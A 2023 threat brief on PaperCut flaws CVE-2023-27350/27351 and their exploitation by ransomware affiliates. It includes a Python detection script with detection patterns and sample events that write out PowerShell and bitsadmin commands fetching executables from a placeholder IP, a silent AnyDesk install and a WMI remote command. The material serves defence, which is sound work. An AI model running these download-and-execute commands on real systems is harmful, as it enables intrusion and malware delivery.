2023-05-15

Patch PaperCut Servers to Defend Against Exploit


Category: Vulnerability | Industry: Global | Level: Tactical | Sources: Horizon3 & Huntress & Microsoft

Horizon3 has released a proof-of-concept (PoC) exploit for PaperCut print management software that achieves remote code execution (RCE). The PoC targets CVE-2023-27350 and CVE-2023-27351, which enable low-complexity attacks with no user interaction: an attacker can bypass authentication and execute arbitrary code on a compromised PaperCut server with SYSTEM privileges. "Both of these vulnerabilities have been fixed in PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11 and 22.0.9 and later," as stated by PaperCut in its latest security advisory. The attack surface for the exploit is relatively small: a Shodan search identified only approximately 1,700 internet-facing servers. Researchers from Huntress have observed exploited PaperCut servers executing PowerShell commands to drop remote access software such as Atera and Syncro. Based on the registered infrastructure used to drop that software, operators from the Clop ransomware gang are involved in exploiting PaperCut servers, raising concerns that this exploit will lead to ransomware attacks.

The Clop and LockBit ransomware gangs have been attributed to attacks exploiting PaperCut servers. In a tweet from Microsoft's Threat Intelligence team, Clop ransomware affiliates were observed running "PowerShell commands to deliver a TrueBot DLL, which connected to a C2 server, attempted to steal LSASS credentials, and injected the TrueBot payload into the conhost.exe service." The operators then installed a Cobalt Strike Beacon, ran reconnaissance commands and used WMI for lateral movement. Data was exfiltrated to MegaSync. While fewer details were provided for LockBit, Microsoft shared that it has also observed intrusions resulting in LockBit ransomware.

Anvilogic Scenarios:

  • PS/BitsAdmin Downloads Payload for Remote Access
  • PowerShell Fuels System Compromise for Lateral Movement

Anvilogic Use Cases:

  • Invoke-WebRequest Command
  • BITSadmin Execution
  • AnyDesk Execution from Suspicious Folder
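
The activity described above (a PaperCut server process spawning a shell, PowerShell and bitsadmin download cradles, remote access tools launched from staging folders, and WMI lateral movement) maps directly onto process-creation detections of the kind listed in the use cases. The following is an added Python example and is not Anvilogic's, Huntress's or Microsoft's detection content. It assumes Sysmon-style field names (host, parent_image, image, command_line), assumes the PaperCut application server runs as pc-app.exe (not stated in the brief), uses a hypothetical list of remote access tool names and staging folders, and runs over constructed sample events rather than real telemetry.

```python
import re
from typing import Callable

# Process-creation event shape (Sysmon Event ID 1 / EDR equivalent); field names are hypothetical.
Event = dict

# Assumptions (not from the brief): the PaperCut application server runs as pc-app.exe,
# and these tool-name fragments and staging folders are what a defender would watch for.
# Tune both lists to the environment.
PAPERCUT_PROCESSES = {"pc-app.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
REMOTE_ACCESS_TOOLS = ("anydesk", "atera", "syncro")
STAGING_FOLDERS = ("\\temp\\", "\\users\\public\\", "\\downloads\\")

# PowerShell download cradles commonly seen in command lines.
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def papercut_spawns_shell(ev: Event) -> bool:
    """PaperCut server process spawning a command shell: a post-exploitation indicator."""
    return basename(ev["parent_image"]) in PAPERCUT_PROCESSES and basename(ev["image"]) in SHELLS


def invoke_webrequest(ev: Event) -> bool:
    """PowerShell download cradle (Invoke-WebRequest and friends) in the command line."""
    cmd = ev["command_line"]
    uses_ps = basename(ev["image"]) in {"powershell.exe", "pwsh.exe"} or "powershell" in cmd.lower()
    return uses_ps and DOWNLOAD_CRADLE.search(cmd) is not None


def bitsadmin_download(ev: Event) -> bool:
    """bitsadmin used to transfer a file (living-off-the-land download)."""
    return basename(ev["image"]) == "bitsadmin.exe" and "/transfer" in ev["command_line"].lower()


def rat_from_staging_folder(ev: Event) -> bool:
    """Remote access tool running from a user-writable staging folder instead of its install path."""
    image = ev["image"].lower()
    name = basename(image)
    return any(t in name for t in REMOTE_ACCESS_TOOLS) and any(f in image for f in STAGING_FOLDERS)


def wmi_remote_process(ev: Event) -> bool:
    """wmic creating a process on another host (WMI lateral movement)."""
    cmd = ev["command_line"].lower()
    return basename(ev["image"]) == "wmic.exe" and "/node:" in cmd and "process call create" in cmd


RULES: list[tuple[str, Callable[[Event], bool]]] = [
    ("papercut_spawns_shell", papercut_spawns_shell),
    ("invoke_webrequest", invoke_webrequest),
    ("bitsadmin_download", bitsadmin_download),
    ("rat_from_staging_folder", rat_from_staging_folder),
    ("wmi_remote_process", wmi_remote_process),
]


def detect(ev: Event) -> list[str]:
    """Names of every rule the event trips, in RULES order."""
    return [name for name, rule in RULES if rule(ev)]


def scan(events: list[Event]) -> list[tuple[str, list[str]]]:
    """(host, matched rule names) for each event that trips at least one rule."""
    findings = []
    for ev in events:
        hits = detect(ev)
        if hits:
            findings.append((ev["host"], hits))
    return findings


# Constructed sample telemetry, not real logs; 203.0.113.0/24 is a documentation address range.
SAMPLE_EVENTS: list[Event] = [
    {"host": "print01", "parent_image": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c powershell -nop -w hidden Invoke-WebRequest http://203.0.113.10/setup.exe -OutFile C:\Windows\Temp\setup.exe"},
    {"host": "print01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin /transfer job /download /priority high http://203.0.113.10/agent.exe C:\Users\Public\agent.exe"},
    {"host": "print01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\AnyDesk.exe",
     "command_line": r"AnyDesk.exe --install C:\ProgramData\AnyDesk --silent"},
    {"host": "ws03", "parent_image": r"C:\Windows\System32\services.exe",   # benign: installed path
     "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "command_line": r'"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service'},
    {"host": "ws07", "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r'wmic /node:fs01 process call create "cmd /c whoami"'},
    {"host": "ws07", "parent_image": r"C:\Windows\explorer.exe",            # benign: user activity
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS):
        print(host, ", ".join(hits))
```

The PaperCut-spawns-shell rule is the highest-signal one because a print server's application process has no routine reason to launch cmd.exe or PowerShell; the download-cradle, bitsadmin and WMI rules are noisier on their own and work best correlated on the same host within a short window, which is what the scenarios above describe.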
